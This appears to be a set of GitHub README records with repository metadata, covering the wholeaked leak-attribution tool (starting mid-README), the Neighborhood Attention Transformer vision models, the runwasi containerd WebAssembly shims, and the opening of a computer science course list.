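To make the validation idea concrete, here is a minimal Python sketch of the simplest detection mode, the SHA256 **File Hash** mode described under "File Types and Detection Modes" below: since every recipient's copy differs at least by its hidden signature, every copy hashes differently, and the leaked file's hash identifies its owner. This is an illustration only, not wholeaked's actual Go implementation; the `files/<Recipient>/` layout and the `db.csv` name mirror examples later in this README, while the helper names and the CSV columns are hypothetical:

```python
import csv
import hashlib
from pathlib import Path
from typing import Optional

def sha256_of(path: Path) -> str:
    """Return the SHA256 hex digest of a file, read in chunks."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(8192), b""):
            h.update(chunk)
    return h.hexdigest()

def build_db(project_dir: Path, db_path: Path) -> None:
    """Record one row per recipient copy: recipient name, file hash."""
    with open(db_path, "w", newline="") as f:
        writer = csv.writer(f)
        for copy in sorted(project_dir.glob("files/*/*")):
            writer.writerow([copy.parent.name, sha256_of(copy)])

def find_leaker(leaked: Path, db_path: Path) -> Optional[str]:
    """Match the leaked file's hash against the recorded signatures."""
    digest = sha256_of(leaked)
    with open(db_path) as f:
        for recipient, recorded in csv.reader(f):
            if recorded == digest:
                return recipient
    return None
```

With a project generated as in the Usage section below, `find_leaker(Path("leaked.pdf"), Path("test_project/db.csv"))` would return the matching recipient's name, or `None` if nothing matches (a modified file defeats plain hashing, which is where the binary, metadata, and watermark modes come in).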
## Demonstration Video

[![Demo Video](https://img.youtube.com/vi/EEDtXp9ngHw/0.jpg)](https://www.youtube.com/watch?v=EEDtXp9ngHw)

## File Types and Detection Modes

wholeaked can add the unique signature to different sections of a file. Available detection modes are given below:

**File Hash:** SHA256 hash of the file. All file types are supported.

**Binary:** The signature is directly added to the binary. *Almost* all file types are supported.

**Metadata:** The signature is added to a metadata section of a file. Supported file types: PDF, DOCX, XLSX, PPTX, MOV, JPG, PNG, GIF, EPS, AI, PSD

**Watermark:** An invisible signature is inserted into the text. Only PDF files are supported.

# Installation

## From Binary

You can download the pre-built binaries from the [releases](https://github.com/utkusen/wholeaked/releases/latest) page and run. For example:

`unzip wholeaked_0.1.0_macOS_amd64.zip`

`./wholeaked --help`

## From Source

1) Install Go on your system
2) Run: `go install github.com/utkusen/wholeaked@latest`

## Installing Dependencies

wholeaked requires `exiftool` for adding signatures to the metadata section of files. If you don't want to use this feature, you don't need to install it.

1) Debian-based Linux: Run `apt install exiftool`
2) macOS: Run `brew install exiftool`
3) Windows: Download exiftool from here https://exiftool.org/ and put the `exiftool.exe` in the same directory with wholeaked.

wholeaked requires `pdftotext` for verifying watermarks inside PDF files. If you don't want to use this feature, you don't need to install it.

1) Download "Xpdf command line tools" for Linux, macOS or Windows from here: https://www.xpdfreader.com/download.html
2) Extract the archive and navigate to the `bin64` folder.
3) Copy the `pdftotext` (or `pdftotext.exe`) executable to the same folder with wholeaked
4) For Debian-based Linux: Run the `apt install libfontconfig` command.

# Usage

## Basic Usage

wholeaked requires a project name `-n`, the path of the base file to which the signatures will be added `-f`, and a list of target recipients `-t`.

Example command: `./wholeaked -n test_project -f secret.pdf -t targets.txt`

The `targets.txt` file should contain a name and an e-mail address on each line, in the following format:

```
Utku Sen,utku@utkusen.com
Bill Gates,bill@microsoft.com
```

After execution is completed, the following unique files will be generated:

```
test_project/files/Utku_Sen/secret.pdf
test_project/files/Bill_Gates/secret.pdf
```

By default, wholeaked adds signatures to all available places that are defined in the "File Types and Detection Modes" section. If you don't want to use a method, you can disable it with a `false` flag. For example:

`./wholeaked -n test_project -f secret.pdf -t targets.txt -binary=false -metadata=false -watermark=false`

## Sending E-mails

In order to send e-mails, you need to fill some sections in the `CONFIG` file.

- If you want to send e-mails via Sendgrid, type your API key to the `SENDGRID_API_KEY` section.
- If you want to send e-mails via AWS SES integration, you need to install `awscli` on your machine and add the required AWS key to it. wholeaked will read the key by itself. But you need to fill the `AWS_REGION` section in the config file.
- If you want to send e-mails via an SMTP server, fill the `SMTP_SERVER`, `SMTP_PORT`, `SMTP_USERNAME`, `SMTP_PASSWORD` sections.

The other necessary fields to fill:

- `EMAIL_TEMPLATE_PATH` Path of the e-mail's body. You can use HTML or text format.
- `EMAIL_CONTENT_TYPE` Can be `html` or `text`
- `EMAIL_SUBJECT` Subject of the e-mail
- `FROM_NAME` From name of the e-mail
- `FROM_EMAIL` From e-mail of the e-mail

To specify the sending method, you can use the `-sendgrid`, `-ses` or `-smtp` flags. For example:

`./wholeaked -n test_project -f secret.pdf -t targets.txt -sendgrid`

## Validating a Leaked File

You can use the `-validate` flag to reveal the owner of a leaked file. wholeaked will compare the signatures detected in the file against the database located in the project folder. Example:

`./wholeaked -n test_project -f secret.pdf -validate`

**Important:** You shouldn't delete the `project_folder/db.csv` file if you want to use the file validation feature. If that file is deleted, wholeaked won't be able to compare the signatures.

# Donation

Loved the project? You can buy me a coffee

<a href="https://www.buymeacoffee.com/utkusen" target="_blank"><img src="https://cdn.buymeacoffee.com/buttons/default-orange.png" alt="Buy Me A Coffee" height="41" width="174"></a>
a file-sharing tool that allows you to find the responsible person in case of a leakage
osint,security,file-sharing,privacy,privacy-tools
1
5
5
17
1
1
0
SHI-Labs/Neighborhood-Attention-Transformer
# Neighborhood Attention Transformers <a href="https://openaccess.thecvf.com/content/CVPR2023/html/Hassani_Neighborhood_Attention_Transformer_CVPR_2023_paper.html"><img src="https://img.shields.io/badge/CVPR2023-Neighborhood%20Attention%20Transformer-%2300B0F0" /></a> <a href="https://arxiv.org/abs/2209.15001"><img src="https://img.shields.io/badge/arXiv-Dilated%20Neighborhood%20Attention%20Trasnformer-%23C209C1" /></a> [<img src="https://img.shields.io/badge/CUDA%20Extension-NATTEN-%23fc6562" />](https://github.com/SHI-Labs/NATTEN) [![PWC](https://img.shields.io/endpoint.svg?url=https://paperswithcode.com/badge/dilated-neighborhood-attention-transformer/instance-segmentation-on-ade20k-val)](https://paperswithcode.com/sota/instance-segmentation-on-ade20k-val?p=dilated-neighborhood-attention-transformer) [![PWC](https://img.shields.io/endpoint.svg?url=https://paperswithcode.com/badge/dilated-neighborhood-attention-transformer/panoptic-segmentation-on-ade20k-val)](https://paperswithcode.com/sota/panoptic-segmentation-on-ade20k-val?p=dilated-neighborhood-attention-transformer) [![PWC](https://img.shields.io/endpoint.svg?url=https://paperswithcode.com/badge/dilated-neighborhood-attention-transformer/instance-segmentation-on-cityscapes-val)](https://paperswithcode.com/sota/instance-segmentation-on-cityscapes-val?p=dilated-neighborhood-attention-transformer) [![PWC](https://img.shields.io/endpoint.svg?url=https://paperswithcode.com/badge/dilated-neighborhood-attention-transformer/panoptic-segmentation-on-coco-minival)](https://paperswithcode.com/sota/panoptic-segmentation-on-coco-minival?p=dilated-neighborhood-attention-transformer) [![PWC](https://img.shields.io/endpoint.svg?url=https://paperswithcode.com/badge/dilated-neighborhood-attention-transformer/semantic-segmentation-on-ade20k-val)](https://paperswithcode.com/sota/semantic-segmentation-on-ade20k-val?p=dilated-neighborhood-attention-transformer) [![PWC](https://img.shields.io/endpoint.svg?url=https://paperswithcode.com/badge/dilated-neighborhood-attention-transformer/semantic-segmentation-on-cityscapes-val)](https://paperswithcode.com/sota/semantic-segmentation-on-cityscapes-val?p=dilated-neighborhood-attention-transformer) [![PWC](https://img.shields.io/endpoint.svg?url=https://paperswithcode.com/badge/dilated-neighborhood-attention-transformer/panoptic-segmentation-on-cityscapes-val)](https://paperswithcode.com/sota/panoptic-segmentation-on-cityscapes-val?p=dilated-neighborhood-attention-transformer) [![PWC](https://img.shields.io/endpoint.svg?url=https://paperswithcode.com/badge/dilated-neighborhood-attention-transformer/instance-segmentation-on-coco-minival)](https://paperswithcode.com/sota/instance-segmentation-on-coco-minival?p=dilated-neighborhood-attention-transformer) [![PWC](https://img.shields.io/endpoint.svg?url=https://paperswithcode.com/badge/stylenat-giving-each-head-a-new-perspective/image-generation-on-ffhq-256-x-256)](https://paperswithcode.com/sota/image-generation-on-ffhq-256-x-256?p=stylenat-giving-each-head-a-new-perspective) [![PWC](https://img.shields.io/endpoint.svg?url=https://paperswithcode.com/badge/stylenat-giving-each-head-a-new-perspective/image-generation-on-ffhq-1024-x-1024)](https://paperswithcode.com/sota/image-generation-on-ffhq-1024-x-1024?p=stylenat-giving-each-head-a-new-perspective) 
[![PWC](https://img.shields.io/endpoint.svg?url=https://paperswithcode.com/badge/stylenat-giving-each-head-a-new-perspective/image-generation-on-lsun-churches-256-x-256)](https://paperswithcode.com/sota/image-generation-on-lsun-churches-256-x-256?p=stylenat-giving-each-head-a-new-perspective)

![NAT-Intro](assets/dinat/intro_dark.png#gh-dark-mode-only)
![NAT-Intro](assets/dinat/intro_light.png#gh-light-mode-only)

**Powerful hierarchical vision transformers based on sliding window attention.**

Neighborhood Attention (NA, local attention) was introduced in our original paper, [NAT](NAT.md), and runs efficiently with our extension to PyTorch, [NATTEN](https://github.com/SHI-Labs/NATTEN).

We recently introduced a new model, [DiNAT](DiNAT.md), which extends NA by dilating neighborhoods (DiNA, sparse global attention, a.k.a. dilated local attention).

Combinations of NA/DiNA are capable of preserving locality, maintaining translational equivariance, expanding the receptive field exponentially, and capturing longer-range inter-dependencies, leading to significant performance boosts in downstream vision tasks, such as [StyleNAT](https://github.com/SHI-Labs/StyleNAT) for image generation.

# News

### March 25, 2023
* Neighborhood Attention Transformer was accepted to CVPR 2023!

### November 18, 2022
* NAT and DiNAT are now available through HuggingFace's [transformers](https://github.com/huggingface/transformers).
* NAT and DiNAT classification models are also available on the HuggingFace Model Hub: [NAT](https://huggingface.co/models?filter=nat) | [DiNAT](https://huggingface.co/models?filter=dinat)

### November 11, 2022
* New preprint: [StyleNAT: Giving Each Head a New Perspective](https://github.com/SHI-Labs/StyleNAT).
* A style-based GAN powered with Neighborhood Attention sets a new SOTA on FFHQ-256 with a 2.05 FID.

![stylenat](assets/stylenat/stylenat.png)

### October 8, 2022
* [NATTEN](https://github.com/SHI-Labs/NATTEN) is now [available as a pip package](https://www.shi-labs.com/natten/)!
* You can now install NATTEN with pre-compiled wheels, and start using it in seconds.
* NATTEN will be maintained and developed as a [separate project](https://github.com/SHI-Labs/NATTEN) to support broader usage of sliding window attention, even beyond computer vision.

### September 29, 2022
* New preprint: [Dilated Neighborhood Attention Transformer](DiNAT.md).

# Dilated Neighborhood Attention :fire:

![DiNAT-Abs](assets/dinat/radar_dark.png#gh-dark-mode-only)
![DiNAT-Abs](assets/dinat/radar_light.png#gh-light-mode-only)

A new hierarchical vision transformer based on Neighborhood Attention (local attention) and Dilated Neighborhood Attention (sparse global attention) that enjoys significant performance boosts in downstream tasks.

Check out the [DiNAT README](DiNAT.md).

# Neighborhood Attention Transformer

![NAT-Abs](assets/nat/computeplot_dark.png#gh-dark-mode-only)
![NAT-Abs](assets/nat/computeplot_light.png#gh-light-mode-only)

Our original paper, [Neighborhood Attention Transformer (NAT)](NAT.md), introduced the first efficient sliding-window local attention.

# How Neighborhood Attention works

Neighborhood Attention localizes the query token's (red) receptive field to its nearest neighboring tokens in the key-value pair (green). This is equivalent to dot-product self attention when the neighborhood size is identical to the image dimensions. Note that the edges are special (edge) cases.
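For intuition, the operation can be sketched as follows. This is a deliberately naive, single-head PyTorch reference written for clarity rather than speed; it is an illustration, not NATTEN's implementation (no batching, no multiple heads, no relative positional bias, and a simple border clamp that may differ in detail from NATTEN's kernels). Setting `dilation > 1` sketches the dilated variant (DiNA):

```python
import torch
import torch.nn.functional as F

def neighborhood_attention(q, k, v, kernel_size=7, dilation=1):
    """Naive (slow) single-head 2D neighborhood attention.

    q, k, v: (H, W, d) tensors. Each query position attends only to a
    kernel_size x kernel_size window of key/value positions around it,
    sampled every `dilation` pixels and clamped at the borders so that
    edge queries still see a full window. With kernel_size == H == W
    and dilation == 1 this reduces to ordinary dot-product self attention.
    """
    H, W, d = q.shape
    span = dilation * (kernel_size - 1) + 1    # spatial extent of the window
    radius = (kernel_size // 2) * dilation
    assert H >= span and W >= span, "feature map smaller than the window"
    out = torch.empty_like(q)
    for i in range(H):
        i0 = min(max(i - radius, 0), H - span)   # clamp: the edge case
        for j in range(W):
            j0 = min(max(j - radius, 0), W - span)
            keys = k[i0:i0 + span:dilation, j0:j0 + span:dilation].reshape(-1, d)
            vals = v[i0:i0 + span:dilation, j0:j0 + span:dilation].reshape(-1, d)
            attn = F.softmax(q[i, j] @ keys.T / d ** 0.5, dim=-1)
            out[i, j] = attn @ vals
    return out

# Tiny smoke test: a 14x14 map with 32-dim tokens, dilated neighborhoods.
x = torch.randn(14, 14, 32)
y = neighborhood_attention(x, x, x, kernel_size=7, dilation=2)
print(y.shape)  # torch.Size([14, 14, 32])
```

NATTEN implements the same computation with fused CUDA kernels, relative positional biases, and multi-head support, so the sketch above is only for building intuition.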
![720p_fast_dm](assets/nat/720p_fast_dm.gif#gh-dark-mode-only)
![720p_fast_lm](assets/nat/720p_fast_lm.gif#gh-light-mode-only)

# Citation

```bibtex
@inproceedings{hassani2023neighborhood,
    title     = {Neighborhood Attention Transformer},
    author    = {Ali Hassani and Steven Walton and Jiachen Li and Shen Li and Humphrey Shi},
    booktitle = {Proceedings of the IEEE/CVF Conference on Computer Vision and Pattern Recognition (CVPR)},
    month     = {June},
    year      = {2023},
    pages     = {6185-6194}
}
@article{hassani2022dilated,
    title         = {Dilated Neighborhood Attention Transformer},
    author        = {Ali Hassani and Humphrey Shi},
    year          = 2022,
    url           = {https://arxiv.org/abs/2209.15001},
    eprint        = {2209.15001},
    archiveprefix = {arXiv},
    primaryclass  = {cs.CV}
}
@article{walton2022stylenat,
    title         = {StyleNAT: Giving Each Head a New Perspective},
    author        = {Steven Walton and Ali Hassani and Xingqian Xu and Zhangyang Wang and Humphrey Shi},
    year          = 2022,
    url           = {https://arxiv.org/abs/2211.05770},
    eprint        = {2211.05770},
    archiveprefix = {arXiv},
    primaryclass  = {cs.CV}
}
```
Neighborhood Attention Transformer, arxiv 2022 / CVPR 2023. Dilated Neighborhood Attention Transformer, arxiv 2022
neighborhood-attention,pytorch
0
9
27
107
1
2
0
containerd/runwasi
![runwasi logo light mode](./art/logo/runwasi_icon1.svg#gh-light-mode-only)
![runwasi logo dark mode](./art/logo/runwasi_icon3.svg#gh-dark-mode-only)

# runwasi

> Warning: Alpha quality software, do not use in production.

This is a project to facilitate running wasm workloads managed by containerd either directly (i.e. through ctr) or as directed by Kubelet via the CRI plugin.
It is intended to be a (rust) library that you can take and integrate with your wasm host.
Included in the repository is a PoC for running a plain wasi host (i.e. no extra host functions except to support wasi system calls).

## Community

- If you haven't joined the CNCF slack yet, you can do so [here](https://slack.cncf.io/).
- Come join us on our [slack channel #runwasi](https://cloud-native.slack.com/archives/C04LTPB6Z0V) on the CNCF slack.
- Public Community Call on Tuesdays every other week at 9:00 AM PT: [Zoom](https://zoom.us/my/containerd?pwd=bENmREpnSGRNRXdBZWV5UG8wbU1oUT09), [Meeting Notes](https://docs.google.com/document/d/1aOJ-O7fgMyRowHD0kOoA2Z_4d19NyAvvdqOkZO3Su_M/edit?usp=sharing)

## Usage

runwasi is intended to be consumed as a library to be linked to from your own wasm host implementation.

There are two modes of operation supported:

1. "Normal" mode where there is 1 shim process per container or k8s pod.
2. "Shared" mode where there is a single manager service running all shims in process.

In either case you need to implement a trait to teach runwasi how to use your wasm host.

There are two ways to do this:
* implementing the `sandbox::Instance` trait
* or implementing the `container::Engine` trait

The most flexible, but also most complex, option is the `sandbox::Instance` trait:

```rust
pub trait Instance {
    /// The WASI engine type
    type Engine: Send + Sync + Clone;

    /// Create a new instance
    fn new(id: String, cfg: Option<&InstanceConfig<Self::Engine>>) -> Self;
    /// Start the instance
    /// The returned value should be a unique ID (such as a PID) for the instance.
    /// Nothing internally should be using this ID, but it is returned to containerd where a user may want to use it.
    fn start(&self) -> Result<u32, Error>;
    /// Send a signal to the instance
    fn kill(&self, signal: u32) -> Result<(), Error>;
    /// Delete any reference to the instance
    /// This is called after the instance has exited.
    fn delete(&self) -> Result<(), Error>;
    /// Wait for the instance to exit
    /// The waiter is used to send the exit code and time back to the caller
    /// Ideally this would just be a blocking call with a normal result, however
    /// because of how this is called from a thread it causes issues with lifetimes of the trait implementer.
    fn wait(&self, waiter: &Wait) -> Result<(), Error>;
}
```

The `container::Engine` trait provides a simplified API:

```rust
pub trait Engine: Clone + Send + Sync + 'static {
    /// The name to use for this engine
    fn name() -> &'static str;
    /// Run a WebAssembly container
    fn run_wasi(&self, ctx: &impl RuntimeContext, stdio: Stdio) -> Result<i32>;
    /// Check that the runtime can run the container.
    /// This check runs after container creation and before the container starts.
    /// By default it checks that the wasi_entrypoint is either:
    /// * a file with the `wasm` filetype header
    /// * a parsable `wat` file.
    fn can_handle(&self, ctx: &impl RuntimeContext) -> Result<()> { /* default implementation */ }
}
```

After implementing `container::Engine` you can use `container::Instance<impl container::Engine>`, which implements the `sandbox::Instance` trait.
To use your implementation in "normal" mode, you'll need to create a binary which has a main that looks something like this:

```rust
use containerd_shim as shim;
use containerd_shim_wasm::sandbox::{ShimCli, Instance};

struct MyInstance {
    // ...
}

impl Instance for MyInstance {
    // ...
}

fn main() {
    shim::run::<ShimCli<MyInstance>>("io.containerd.myshim.v1", opts);
}
```

or when using the `container::Engine` trait, like this:

```rust
use containerd_shim as shim;
use containerd_shim_wasm::{sandbox::ShimCli, container::{Instance, Engine}};

struct MyEngine {
    // ...
}

impl Engine for MyEngine {
    // ...
}

fn main() {
    shim::run::<ShimCli<Instance<MyEngine>>>("io.containerd.myshim.v1", opts);
}
```

Note you can implement your own ShimCli if you like and customize your wasm engine and other things. I encourage you to check out how that is implemented.

The shim binary just needs to be installed into `$PATH` (as seen by the containerd process) with a binary name like `containerd-shim-myshim-v1`.

For the shared mode:

```rust
use std::sync::Arc;

use containerd_shim_wasm::sandbox::{Local, ManagerService, Instance};
use containerd_shim_wasm::services::sandbox_ttrpc::{create_manager, Manager};
use ttrpc::{self, Server};

// ...

struct MyInstance {
    // ...
}

impl Instance for MyInstance {
    // ...
}

fn main() {
    // `Engine` and `Config` here come from the embedded wasm runtime (e.g. wasmtime).
    let s: ManagerService<Local<MyInstance>> =
        ManagerService::new(Engine::new(Config::new().interruptable(true)).unwrap());
    let s = Arc::new(Box::new(s) as Box<dyn Manager + Send + Sync>);
    let service = create_manager(s);

    let mut server = Server::new()
        .bind("unix:///run/io.containerd.myshim.v1/manager.sock")
        .unwrap()
        .register_service(service);

    server.start().unwrap();
    let (_tx, rx) = std::sync::mpsc::channel::<()>();
    rx.recv().unwrap();
}
```

This will be the host daemon that you start up and manage on your own.
You can use the provided `containerd-shim-myshim-v1` binary as the shim to specify in containerd.

Shared mode requires precise control over real threads and as such should not be used with an async runtime.

Check out these projects that build on top of runwasi:
- [spinkube/containerd-shim-spin](https://github.com/spinkube/containerd-shim-spin)
- [deislabs/containerd-wasm-shims](https://github.com/deislabs/containerd-wasm-shims)

### Components

- **containerd-shim-[ wasmedge | wasmtime | wasmer ]-v1**

This is a containerd shim which runs wasm workloads in [WasmEdge](https://github.com/WasmEdge/WasmEdge), [Wasmtime](https://github.com/bytecodealliance/wasmtime) or [Wasmer](https://github.com/wasmerio/wasmer).
You can use it with containerd's `ctr` by specifying `--runtime=io.containerd.[ wasmedge | wasmtime | wasmer ].v1` when creating the container.
Make sure the shim binary is in `$PATH` (that is, the `$PATH` that containerd sees). Usually you just run `make install` after `make build`.

> To build the shim with WasmEdge, you need to install the WasmEdge library first.

This shim runs one per pod.

- **containerd-shim-[ wasmedge | wasmtime | wasmer ]d-v1**

A cli used to connect containerd to the `containerd-[ wasmedge | wasmtime | wasmer ]d` sandbox daemon.
When containerd requests a new container, it fires up this shim binary, which connects to the `containerd-[ wasmedge | wasmtime | wasmer ]d` service running on the host.
The service returns a path to a unix socket, which this shim binary writes back to containerd; containerd then connects to that socket for shim requests.
This binary does not serve requests; it is only responsible for sending requests to the `containerd-[ wasmedge | wasmtime | wasmer ]d` daemon to create or destroy sandboxes.

- **containerd-[ wasmedge | wasmtime | wasmer ]d**

This is a sandbox manager that enables running 1 wasm host for the entire node instead of one per pod (or container).
When a container is created, a request is sent to this service to create a sandbox. The "sandbox" is a containerd task service that runs in a new thread on its own unix socket, which we return back to containerd to connect to.

The WasmEdge / Wasmtime / Wasmer engine is shared between all sandboxes in the service.

To use this shim, specify `io.containerd.[ wasmedge | wasmtime | wasmer ]d.v1` as the runtime to use. You will need to make sure the `containerd-[ wasmedge | wasmtime | wasmer ]d` daemon has already been started.

## Contributing

To begin contributing, learn to build and test the project or to add a new shim please read our [CONTRIBUTING.md](./CONTRIBUTING.md)

## Demo

### Installing the shims for use with Containerd

Make sure you have [installed dependencies](./CONTRIBUTING.md#setting-up-your-local-environment) and install the shims:

```terminal
make build
sudo make install
```

> Note: `make build` will only build one binary. The `make install` command copies the binary to $PATH and uses symlinks to create all the components described above.

Build the test image and load it into containerd:

```
make test-image
make load
```

### Demo 1 using a container image that contains a Wasm module.

Run it with `sudo ctr run --rm --runtime=io.containerd.[ wasmedge | wasmtime | wasmer ].v1 ghcr.io/containerd/runwasi/wasi-demo-app:latest testwasm /wasi-demo-app.wasm echo 'hello'`.
You should see some output repeated like:

```terminal
sudo ctr run --rm --runtime=io.containerd.wasmtime.v1 ghcr.io/containerd/runwasi/wasi-demo-app:latest testwasm

This is a song that never ends.
Yes, it goes on and on my friends.
Some people started singing it not knowing what it was,
So they'll continue singing it forever just because...

This is a song that never ends.
Yes, it goes on and on my friends.
Some people started singing it not knowing what it was,
So they'll continue singing it forever just because...

(...)
```

To kill the process, you can run in another session: `sudo ctr task kill -s SIGKILL testwasm`.

The test binary supports commands for different types of functionality; check [crates/wasi-demo-app/src/main.rs](crates/wasi-demo-app/src/main.rs) to try it out.

### Demo 2 using OCI Images with custom WASM layers

The previous demo runs with an OCI Container image containing the wasm module in the file system. Another option is to provide a cross-platform OCI Image that will not have the wasm module or components in the file system of the container that wraps the wasmtime/wasmedge process. This OCI Image with custom WASM layers can be run across any platform and provides for de-duplication in the Containerd content store among other benefits. To build OCI images using your own images you can use the [oci-tar-builder](./crates/oci-tar-builder/README.md)

To learn more about this approach check out the [design document](https://docs.google.com/document/d/11shgC3l6gplBjWF1VJCWvN_9do51otscAm0hBDGSSAc/edit).

> **Note**: This requires containerd 1.7.7+ and 1.6.25+. If you do not have these patches for both `containerd` and `ctr` you will end up with an error message such as `mismatched image rootfs and manifest layers` at the import and run steps.
Latest versions of k3s and kind have the necessary containerd versions.

Build and import the OCI image with WASM layers:

```
make test-image/oci
make load/oci
```

Run the image with `sudo ctr run --rm --runtime=io.containerd.[ wasmedge | wasmtime | wasmer ].v1 ghcr.io/containerd/runwasi/wasi-demo-oci:latest testwasmoci`

```
sudo ctr run --rm --runtime=io.containerd.wasmtime.v1 ghcr.io/containerd/runwasi/wasi-demo-oci:latest testwasmoci wasi-demo-oci.wasm echo 'hello'
hello
exiting
```
Facilitates running Wasm / WASI workloads managed by containerd
containerd,kubernetes,rust,wasi,wasm,webassembly
25
57
488
1,068
51
7
10
forthespada/Awsome-Courses
<p align="center">
<a href="https://github.com/awesome-cs-community/Awsome-Courses" target="_blank">
    <img src="http://oss.interviewguide.cn/img/202203261514544.png" alt="loading">
</a>
</p>

<p align="center">"MIT is the temple of STEM students everywhere, famed for its top-tier engineering and computer science."<br>
I originally set out to compile a list of MIT computing courses; it kept growing from there: <strong>MIT, CMU, PKU, THU... enough to make your head spin...</strong></p>

👉 Tip: **If GitHub is slow for you, use the [Gitee mirror](https://gitee.com/ForthEspada/Awsome-Courses); I keep a copy there, updated in sync.**

<b><details><summary>:orange_book: Contribution guide</summary></b>

- Click the `fork` button in the upper-right corner to fork the project to your own GitHub account.
- Use `git clone` to clone the project to your machine.

```
git clone https://github.com/forthespada/Awsome-Courses.git
```

- Open it in an editor, make your contribution, then commit to your forked repository.

```
code .
git add .
git commit -m "What did you do?"
git push origin master
```

- Submit a `Pull request`

</details>

## Programming Resources

Over many years of studying computer science I have gradually collected some good learning resources, now shared for free.

### 1. My own study-notes site

<div>
A summary of years of computer self-study, from campus to the workplace, covering (but not limited to) CS fundamentals, algorithms, frontend and backend, campus and experienced hiring, and work experience at first-tier internet companies. Keep learning, keep growing!
<a href="https://interviewguide.cn/#/" target="_blank">Portal</a>
</div>

<div align="center">
<a href="https://interviewguide.cn/notes/01-guide/web-guide-reading.html">
    <img src="http://oss.interviewguide.cn/img/202205161146636.png" target="_blank">
</a>
</div>

### 2. Assorted quality programming resources

<a href="https://interviewguide.cn/notes/07-resources/01-free/01-introduce.html" target="_blank">Portal</a>

- Hot off the press: Zhejiang University's undergraduate CS courses are open source
- Big news: Tsinghua University's CS department course-guide sharing project!
- 1000+ classic computer science PDF e-books
- LeetCode solutions in Java/C++/Golang
- Complete video sets of Hou Jie's C++ and Chen Shuo's Linux network programming courses
- Campus-hiring interview PDF collections from Alibaba, Baidu, ByteDance, Tencent and other first- and second-tier internet companies
- Top-50 classic CS books as PDFs
- Mind maps of all kinds of hardcore tech learning roadmaps on GitHub
- Illustrated PDFs on operating systems, networking, and computer organization: the fundamentals that make you take off
- A backend must-have: a quick SQL syntax handbook
- 10 resume templates in Word format, free to use
- *Pro Git* (Chinese edition) PDF, to master git's tricks
- ....
## Honest Recommendations

**Overwhelmed by the choices** and not sure which to take?

As someone who has been through it, I recommend the **Crash Course Computer Science series, Harvard's CS50, MIT 6.828, MIT 6.824, and Tsinghua University's OS course** on this page.

These five courses are absolutely worthwhile for most people!

## Excellent Chinese Programming Videos

There are actually many excellent Chinese programming videos as well; I have compiled three installments before, now shared all together!

**Part 1**: [direct link](https://interviewguide.cn/notes/04-experience/01-learn_experience/20210809%20-%20%E7%AC%AC%E4%B8%80%E6%9C%9F-%E6%88%91%E5%AD%A6%E7%BC%96%E7%A8%8B%E5%85%A8%E9%9D%A0B%E7%AB%99%E4%BA%86%EF%BC%8C%E7%9C%9F%E9%A6%99.html)

<img src="http://oss.interviewguide.cn/img/202203261421142.png" alt="Part 1" style="width:400px;" />

**Part 2**: [direct link](https://interviewguide.cn/notes/04-experience/01-learn_experience/20210823%20-%20%E7%AC%AC%E4%BA%8C%E6%9C%9F-%E6%88%91%E5%AD%A6%E7%BC%96%E7%A8%8B%E5%85%A8%E9%9D%A0B%E7%AB%99%E4%BA%86%EF%BC%8C%E7%9C%9F%E9%A6%99.html)

<img src="http://oss.interviewguide.cn/img/202203261421279.png" alt="Part 2" style="width:400px;" />

**Part 3**: [direct link](https://interviewguide.cn/notes/04-experience/01-learn_experience/20210907%20-%20%E7%AC%AC%E4%B8%89%E6%9C%9F-%E6%88%91%E5%AD%A6%E7%BC%96%E7%A8%8B%E5%85%A8%E9%9D%A0B%E7%AB%99%E4%BA%86%EF%BC%8C%E7%9C%9F%E9%A6%99-%E5%9B%BD%E5%A4%96%E7%AF%87%EF%BC%88%E7%AC%AC%E4%B8%89%E6%9C%9F%EF%BC%89.html)

<img src="http://oss.interviewguide.cn/img/202203261422715.png" alt="Part 3" style="width:400px;" />

## Introductory Courses

- **Crash Course Computer Science**

  This course suits beginners in many ways; the videos are concise yet complete, with everything that should be introduced actually introduced, and if you worry that the course is too simple, you would be very wrong.

  - From relays to vacuum tubes, and on to transistors and integrated circuits;
  - From primitive punched paper to the appearance of machine language, then assembly and high-level languages such as Java and C++;
  - From AND/OR/NOT logic operations to how the CPU actually computes;
  - Plus introductions to the newest fields such as machine learning, deep learning, and artificial intelligence.

  If there is one flaw, it is that some episodes are narrated very fast, which can be tiring for non-native listeners; if your English is not strong, watch at 0.75x speed.

  The course will not teach you to program from zero. Instead it explains layer after layer of abstraction from the bottom up, surveying a whole series of computing topics from a high level.

  ![img](http://oss.interviewguide.cn/img/202208030948917.png)

  Along the way it weaves in many fun historical stories; for example, the storage episode opens with the abacus, telling you it appeared around 2500 BC.

  ![img](http://oss.interviewguide.cn/img/202208030948315.png)

  The well-placed stories keep beginners from drying up and quitting halfway, and when it reaches computer networking, animations show how a switch works:

  ![img](http://oss.interviewguide.cn/img/202208030949422.png)

  How a switch works

  All I can say is: not merely satisfying to watch, but exceptionally so.

  Link: https://www.bilibili.com/video/BV1EW411u7th?p=28&vd_source=3fc05c3b7f095e12a12ea9850e2e0a35

- **CS50**

  Harvard's open course: CS50 is the classic introduction to computer science, widely known by its nickname, the computer science crash course.

  Anyone with a normal high-school education should be able to follow it; it genuinely targets zero-background students.
  The course has 20 episodes; at one per day you only need 20 days. It covers basic computer knowledge, fundamental algorithms, common programming languages and so on, and also explores recent results in the field; it is a course strong on divergent thinking.

  One more thing: CS50's lecture style is refreshingly novel and genuinely achieves "joyful learning".

  Link: https://open.163.com/newview/movie/courseintro?newurl=%2Fspecial%2Fopencourse%2Fcs50.html

- **6.0001: Introduction to Computer Science and Programming in Python**

  Aimed at students with little or no programming experience. It seeks to give students an understanding of the role computation can play in solving problems, and to help students of all majors feel justifiably confident in their ability to write small programs that accomplish useful goals.

  Note that the course uses Python 3.5.

  Link: [https://ocw.mit.edu/courses/electrical-engineering-and-computer-science/6-0001-introduction-to-computer-science-and-programming-in-python-fall-2016/](https://link.zhihu.com/?target=https%3A//ocw.mit.edu/courses/electrical-engineering-and-computer-science/6-0001-introduction-to-computer-science-and-programming-in-python-fall-2016/)

- **6.821 Structure and Interpretation of Computer Programs**

  Course pages: [Structure and Interpretation of Computer Programs](https://link.zhihu.com/?target=https%3A//ocw.mit.edu/courses/electrical-engineering-and-computer-science/6-001-structure-and-interpretation-of-computer-programs-spring-2005), [6.821 Programming Languages (Fall 2002)](https://link.zhihu.com/?target=https%3A//ocw.mit.edu/courses/electrical-engineering-and-computer-science/6-821-programming-languages-fall-2002)

